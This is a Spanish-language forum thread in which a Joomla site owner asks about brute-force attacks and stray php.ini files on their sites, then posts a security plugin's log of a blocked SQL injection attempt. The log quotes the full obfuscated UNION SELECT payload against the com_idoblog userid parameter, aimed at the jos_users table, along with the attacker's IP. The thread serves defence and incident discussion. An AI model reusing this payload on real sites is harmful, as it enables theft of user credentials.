Hola amigos...
mi sitio fue atacado hoy mediante fuerza bruta a la zona de admin de joomla...no entraron ya que tengo una contraseña bien fuerte pero se generan archivos php.ini en distintas partes del sitio por ejemplo atacaron /administrator/index.php
(http://dl.dropbox.com/u/56114879/Temporales/Pantallazo.jpg)
el contenido del php.ini es este
allow_url_fopen = 0
que será lo que estan intentando hacer??...
saludos!
php.ini es configuracion del php
y allow_url_fopen
es para permitir ejecución remota de archivos
aunque segun yo tendria que estar asi
allow_url_fopen = 1
para estar activado, ni idea de por que se crearon esos archivos :/
Hola Black Poison como estas...
efectivamente yo tampoco tengo idea de poque se generan estos archivos casi siempre se crean enadministrator y en la raiz del sitio
voy a esperar un tiepo mas aver si aparece alguna otra cosa que me revele el misterio de estos archivos php.ini
gracias!!!!
Saludos
Cuidado, si te pueden crear ficheros en los directorios yo me preocuparía bastante. Suerte que parece que no tienen mucha idea, creando un php.ini allí no van a conseguir nada...
allow_url_fopen permite hacer llamadas externas a urls, y es muy usando para llamar a una shell maliciosa y demás.
hola el-brujo como estas...
tal parece que estos muchachos pillaron mi web (de portfolios) donde tengo todos los trabajos que voy realizadon en diseño de sitios webs y atacaron uno por uno :S
Las ip las localize con el geolocalizador de este portal y pertenecen a Polonia, Brasil, EEUU y lugares que no puedo localizar ya que no llevan a ningun lado (yo soy de argentina...)
en todos los sitios webs que desarrollo instalo un plugin para banear la ip y capturar parte del codigo cuando intentan inyectar o atacar por fuerza bruta
este es el reporte que arroja el plugin
** Union Select [GET:userid] => 62/**/uNiOn/**/sEleCt/**/1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/jos_users--
** Table name in url [GET:userid] => 62 -- 1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users--
** Union Select [REQUEST:userid] => 62/**/uNiOn/**/sEleCt/**/1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/jos_users--
** Table name in url [REQUEST:userid] => 62 -- 1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users--
**PAGE / SERVER INFO
*REMOTE_ADDR :
96.9.149.70
*HTTP_USER_AGENT :
Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_idoblog&task=profile&Itemid=1337&userid=62%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsEleCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users--
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_idoblog
-[task] => profile
-[Itemid] => 1337
-[userid] => 62 -- 1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from -- users--
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_idoblog
-[task] => profile
-[Itemid] => 1337
-[userid] => 62 -- 1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from -- users--
no se si es para precuparme y aumentar mas la seguradad de los sitios tales como proteger la administracion con contraseña del servidor y restringir por un tiempo el sistema de comentario...
saludos!!
gracias